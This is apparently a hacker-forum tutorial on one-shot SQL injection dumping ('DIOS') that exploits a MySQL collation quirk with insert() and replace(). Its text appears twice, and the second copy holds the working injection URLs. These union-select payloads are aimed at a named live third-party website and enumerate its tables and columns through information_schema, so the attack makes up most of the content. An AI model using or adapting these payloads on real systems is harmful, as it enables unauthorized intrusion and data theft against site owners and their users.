toc
-intro
-insert()
-replace()
intro
up to now, to perform dios query, we used local variable.
today, i will show you a way of dump the whole table, without local variable.
but i wanna talk about the bug first.
in mysql, theres a bug, that if theres a utf8 column, and replace some of the content with another utf8/binary content, the webserver wont delete the previous content.
for example, lets say i have a table named "books", with the column "color".
if i wanna add "!" after the word, i can do it by using insert() function.
but what if i use 0x21 instead of "!" ?
we got us a bug.
as we can see, the rows are being concat to each other, and the last row contains all the records.
so what if we use information_schema instead?
why is this happening?
collation('!') = latin1
collation(0x21) = binary
collation(table_name) = utf8.
apperently mysql 5.1+ cant handle mix of utf8 and binary.
a few docs on bugs.mysql-
https://bugs.mysql.com/bug.php?id=49271
https://bugs.mysql.com/bug.php?id=7642
https://bugs.mysql.com/bug.php?id=12351
https://bugs.mysql.com/bug.php?id=16716
https://bugs.mysql.com/bug.php?id=69891
https://bugs.mysql.com/bug.php?id=64338
https://bugs.mysql.com/bug.php?id=9011
https://bugs.mysql.com/bug.php?id=7874
https://bugs.mysql.com/bug.php?id=10572
https://bugs.mysql.com/bug.php?id=3796
https://bugs.mysql.com/bug.php?id=8785
https://bugs.mysql.com/bug.php?id=38980
insert()
as we saw on the intro, we can perform dios using insert().
now i will demonstrate on a live site.
lets try to see if the bug exist.
in this site, theres 1267 (illegal mix) bug, so i will use unhex(hex()).
its ironic, because 1267 suppose to be a fix of that bug.
![[Image: YzwUKo1.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_v1hagL-CS_R5gxZfIhuqLLWexh9FzUkwrPf5FBN9yo1TEclA52ipn2PMbAZU9tAvmp94wOf1cCTrNqSCTryNbNuw=s0-d)
as we can see, each row contains the previous raw.
which means, the last raw contains all the data.
but how can we see only the last row?
well, with limit.
first, we will count the table, and via the last raw by using "limit count-1,1".
59, which means limit 58,1.
we decreasing one number, because the counting starts with 0.
![[Image: zMS8jfV.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vVFGsJsAuVE9_YBvg0YlDv2q9JcqiJlmbX_-0QkZz2IAQ-c18ut-4QCDPtxy9VBY9LjihIbEvwBKbLOyHazAX8=s0-d)
all the tables.
lets arrenge it a bit.
we need to fix 3 things-
*the output is backwards
*make it more normal to look
*add columns.
to overcome the first problem, we will add "reverse" function on the table_name, and another one on the whole insert().
for the 2nd and 3rd problem, we will add "concat", and add column_name and <br>.
the count(*) from columns is 612, so-
![[Image: oFM9VDx.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_v7oiMgGPNBzulkHJfn1z2QAbjUqIjUUZQk-6pSpjyXGdwtHYPfm2g_q8Ed6yeOFhv0-_Px9Be8LYL0bz-1VCmhWA=s0-d)
perfect.
replace()
in replace, we just need to find a utf8 column and replace the content of the column with the content we want.
fortunately, all the system variables are utf8.
![[Image: caua5BC.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uX36aXwcu98po3LLlGRJTvbsyJ3iwervRM5vLCqDtBwYJAJGzErpCO0ad1Wdp7668WbX9EI4tksXZrf4Jfqrds=s0-d)
same bug.
now we will replace the second version with the table_name and column_name concated to @@version, and instead of '5', i will put @@version, to clean our field.
be sure to concat @@version, because we need it to be utf8.
![[Image: hCcfMY6.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_ufNJ7UzkcywS21-Gk77exjvKz9iQI3qgGbBEmGGU0Bw28EXQCZXIJHgIz1J75IGnebuAqAcEiKrSIVjKotnEp9Eg=s0-d)
did i say perfect? i believe so. ;)
hope you learned something.
-intro
-insert()
-replace()
intro
up to now, to perform dios query, we used local variable.
today, i will show you a way of dump the whole table, without local variable.
but i wanna talk about the bug first.
in mysql, theres a bug, that if theres a utf8 column, and replace some of the content with another utf8/binary content, the webserver wont delete the previous content.
for example, lets say i have a table named "books", with the column "color".
Code:
SELECT `color` FROM `books`;
red
green
blueif i wanna add "!" after the word, i can do it by using insert() function.
Code:
SELECT insert("!",1,0,color) FROM books;
red!
green!
blue!but what if i use 0x21 instead of "!" ?
Code:
SELECT insert(0x21,1,0,color) FROM books;
red!
greenred!
bluegreenred!we got us a bug.
as we can see, the rows are being concat to each other, and the last row contains all the records.
so what if we use information_schema instead?
Code:
SELECT insert(0x21,1,0,table_name) FROM information_schema 0.e.tables where table_schema not like 'inf%';
table1!
table2table1!
table3table2table1!why is this happening?
collation('!') = latin1
collation(0x21) = binary
collation(table_name) = utf8.
apperently mysql 5.1+ cant handle mix of utf8 and binary.
a few docs on bugs.mysql-
https://bugs.mysql.com/bug.php?id=49271
https://bugs.mysql.com/bug.php?id=7642
https://bugs.mysql.com/bug.php?id=12351
https://bugs.mysql.com/bug.php?id=16716
https://bugs.mysql.com/bug.php?id=69891
https://bugs.mysql.com/bug.php?id=64338
https://bugs.mysql.com/bug.php?id=9011
https://bugs.mysql.com/bug.php?id=7874
https://bugs.mysql.com/bug.php?id=10572
https://bugs.mysql.com/bug.php?id=3796
https://bugs.mysql.com/bug.php?id=8785
https://bugs.mysql.com/bug.php?id=38980
insert()
as we saw on the intro, we can perform dios using insert().
now i will demonstrate on a live site.
Code:
http://www.replasticsurgery.asia/readnews.php?id=4 and 0 union select 1,2,3,4lets try to see if the bug exist.
in this site, theres 1267 (illegal mix) bug, so i will use unhex(hex()).
its ironic, because 1267 suppose to be a fix of that bug.
Code:
http://www.replasticsurgery.asia/readnews.php?id=4 and 0 union select 1,2,3,insert(0x1,1,0,unhex(hex(table_name))) from information_schema 0.e.tablesas we can see, each row contains the previous raw.
which means, the last raw contains all the data.
but how can we see only the last row?
well, with limit.
first, we will count the table, and via the last raw by using "limit count-1,1".
Code:
http://www.replasticsurgery.asia/readnews.php?id=4 and 0 union select 1,2,3,count(*) from information_schema 0.e.tableswe decreasing one number, because the counting starts with 0.
Code:
http://www.replasticsurgery.asia/readnews.php?id=4 and 0 union select 1,2,3,insert(0x1,1,0,unhex(hex(table_name))) from information_schema 0.e.tables limit 58,1all the tables.
lets arrenge it a bit.
we need to fix 3 things-
*the output is backwards
*make it more normal to look
*add columns.
to overcome the first problem, we will add "reverse" function on the table_name, and another one on the whole insert().
Code:
http://www.replasticsurgery.asia/readnews.php?id=4 and 0 union select 1,2,3,reverse(insert(0x1,1,0,reverse(unhex(hex(table_name))))) FROM information_schema 0.e.tables limit 58,1for the 2nd and 3rd problem, we will add "concat", and add column_name and <br>.
the count(*) from columns is 612, so-
Code:
http://www.replasticsurgery.asia/readnews.php?id=4 and 0 union select 1,2,3,count(*) FROM information_schema.columns
Code:
http://www.replasticsurgery.asia/readnews.php?id=4 and 0 union select 1,2,3,reverse(insert(0x1,1,0,reverse(concat (unhex(hex(table_name)),0x203a20,unhex(hex(column_name)),0x3c62723e)))) from information_schema 0.e.columns limit 611,1perfect.
replace()
in replace, we just need to find a utf8 column and replace the content of the column with the content we want.
fortunately, all the system variables are utf8.
Code:
http://www.replasticsurgery.asia/readnews.php?id=4 and 0 union select 1,2,3,replace(@@version,5,@@version) from information_schema 0.e.tablessame bug.
now we will replace the second version with the table_name and column_name concated to @@version, and instead of '5', i will put @@version, to clean our field.
be sure to concat @@version, because we need it to be utf8.
Code:
http://www.replasticsurgery.asia/readnews.php?id=4 and 0 union select 1,2,3,replace(@@version,@@version,concat (unhex(hex(table_name)),0x203a20,unhex(hex(column_name)),0x3c62723e,@@version)) from information_schema 0.e.columns limit 611,1did i say perfect? i believe so. ;)
hope you learned something.